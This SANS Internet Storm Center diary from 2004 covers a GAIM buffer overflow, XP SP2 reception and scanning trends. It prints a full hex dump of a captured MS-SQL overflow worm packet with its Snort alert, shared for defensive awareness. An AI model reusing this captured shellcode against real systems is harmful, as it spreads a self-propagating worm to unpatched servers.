Threat Level: green Handler on Duty: Didier Stevens

SANS ISC: GAIM buffer overflow, Aitel paper and more XP SP2 SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
GAIM buffer overflow, Aitel paper and more XP SP2
GAIM buffer overflow, Aitel paper and more XP SP2

Gaim Unspecified MSN Protocol Buffer Overflow Vulnerabilities

Multiple Linux distributions released an update for GAIM, an instant messenger suite, to fix a buffer overflow in the MSN IM Protocol handler. While we havent seen this vulnerability being exploited in the wild, this appears to be an interesting trend for a research project.

The concept of 'honey sticks' or similar has been tossed around on mailing lists for a while. Take a vulnerable client (MS IE, or GAIM, or a vulnerable IRC client) and connect to multiple sites to see if they compromise the machine through client access. I heard of a University research project where they were taking snapshots of Windows 2000 boxes with vulnerable Internet Explorer browsers and connecting to thousands of sites polled from search engines and phishing scams. It should be quite interesting to see the fruits of these research projects.

XP Service Pack 2 continues to provide fodder for all sides (pro and con).

One one side, we feel as a whole it provides better security (personal firewall turned on by default, end of support for most named raw sockets, etc) and on the other we have heard many downsides to the ill effects
of SP2.

Johannes put up a page summarizing the initial experience with XP SP2. This can be found here:

Dave Aitel, from Immunitysec just published a research paper titled: "Microsoft Windows, a lower Total Cost of Ownership" located at:

Note that it is 0wnership with a Zero in the above title. The paper is sure to stir up the waters a tad.

Scanning trends continue with 445 leading the pack. There have been a number of attacks against MS-SQL resurfacing, one example from earlier this evening posted below. These are old exploits, old vulnerabilities, and machines that have been 0wn3ed for quite sometime. DBA's, patch thy systems!


21:39:30.585849 > [udp sum ok] udp 376
(ttl 112, id 18373, len 404)
0x0000 4500 0194 47c5 0000 7011 1d05 3d17 3f69 E...G...p...=.?i
0x0010 xxxx xx68 04a1 059a 0180 4c1b 0401 0101 B.%h......L.....
0x0020 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0030 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0040 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0050 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0060 0101 0101 0101 0101 0101 0101 0101 0101 ................
0x0070 0101 0101 0101 0101 0101 0101 01dc c9b0 ................
0x0080 42eb 0e01 0101 0101 0101 70ae 4201 70ae B.........p.B.p.
0x0090 4290 9090 9090 9090 9068 dcc9 b042 b801 B........h...B..
0x00a0 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1...P..5....P
0x00b0 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 ..Qh.dllhel32hke
0x00c0 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
0x00d0 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf.llQh32.dhws2
0x00e0 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f.etQhsockf.toQ
0x00f0 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend....B.E.P..
0x0100 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.E.P.E.P..P....
0x0110 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U..Qt.....
0x0120 42ff 16ff d031 c951 5150 81f1 0301 049b B....1.QQP......
0x0130 81f1 0101 0101 518d 45cc 508b 45c0 50ff ......Q.E.P.E.P.
0x0140 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j...P.E.P.E
0x0150 c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 .P........<a...E
0x0160 b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ...@...........)
0x0170 c28d 0490 01d8 8945 b46a 108d 45b0 5031 .......E.j..E.P1
0x0180 c951 6681 f178 0151 8d45 0350 8b45 ac50 .Qf..x.Q.E.P.E.P
0x0190 ffd6 ebca ....

[**] [1:2050:5] MS-SQL version overflow attempt [**]
[Classification: Misc activity] [Priority: 3]
08/12-21:39:30.585849 -> xx.xx.xx.104:1434
UDP TTL:112 TOS:0x0 ID:18373 IpLen:20 DgmLen:404
Len: 376

[Xref =>]
[Xref =>]
[Xref =>]

Dont forget to check out Dshield and learn how you too can begin to submit sanitized logs and get your own report page. To find out more, visit:

Make use of the ISC data. You can run searches, view trends and gather reports from the following URL's:


Mike Poor

< -- mike [at] -- >

Handler on Duty signing off


49 Posts
Aug 14th 2004

Sign Up for Free or Log In to start participating in the conversation!